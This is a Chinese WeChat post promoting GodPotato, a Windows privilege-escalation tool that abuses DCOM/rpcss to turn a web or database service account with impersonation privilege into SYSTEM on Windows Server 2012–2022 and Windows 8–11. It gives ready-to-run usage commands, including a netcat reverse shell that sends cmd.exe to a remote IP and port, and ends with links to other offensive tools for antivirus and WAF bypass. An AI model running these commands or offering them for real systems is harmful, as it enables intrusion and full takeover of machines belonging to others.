神薯

        根据Potato提权6年的历史，从RottenPotato开始到JuicyPotatoNG结束，我通过研究DCOM发现了一项新技术，可以在Windows 2012 - Windows 2022中实现提权，现在只要你有“冒充特权”权限。那么你就是“NT AUTHORITYSYSTEM”，通常WEB服务和数据库服务都有“ImpersonatePrivilege”权限。

        马铃薯提权通常用在我们获取WEB/数据库权限的时候。我们可以将低权限的服务用户提升为“NT AUTHORITYSYSTEM”权限。然而历史上的Potato却没有办法在最新的Windows系统上运行。当我研究DCOM时，我发现了一种可以执行权限提升的新方法。rpcss在处理ox时存在一些缺陷，rpcss是系统必须开启的服务。，所以它几乎可以运行在任何Windows操作系统上，我将它命名为GodPotato

受影响版本

Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11

使用程序内置的Clsid进行权限提升并执行简单的命令

GodPotato -cmd "cmd /c whoami"

自定义Clsid并执行命令

GodPotato -cmd "cmd /c whoami"

执行反向shell命令

GodPotato -cmd "nc -t -e C:WindowsSystem32cmd.exe 192.168.1.102 2012"

项目地址：

https://github.com/BeichenDream/GodPotato

2023年最受欢迎的渗透测试工具（1） - PhoneSploit-Pro

2023年最受欢迎的渗透测试工具（2） - gmailc2

2023年最受欢迎的渗透测试工具（3）- Faraday 开源漏洞管理平台

2023年最受欢迎的渗透测试工具（4）- CloakQuest3r 隐藏真实IP

2023年最受欢迎的渗透测试工具（5）- Killer Bypass AV

2023年最受欢迎的渗透测试工具（6）- waf-bypass

2023年最受欢迎的渗透测试工具（7）- 支持 GPT 的渗透测试工具

2023年最受欢迎的渗透测试工具（8）- Sirius 漏洞扫描器

2023年最受欢迎的渗透测试工具（9）- Linux 安全和监控脚本

原文始发于微信公众号（TtTeam）：2023年最受欢迎​​的渗透测试工具（10）- GodPotato 提权土豆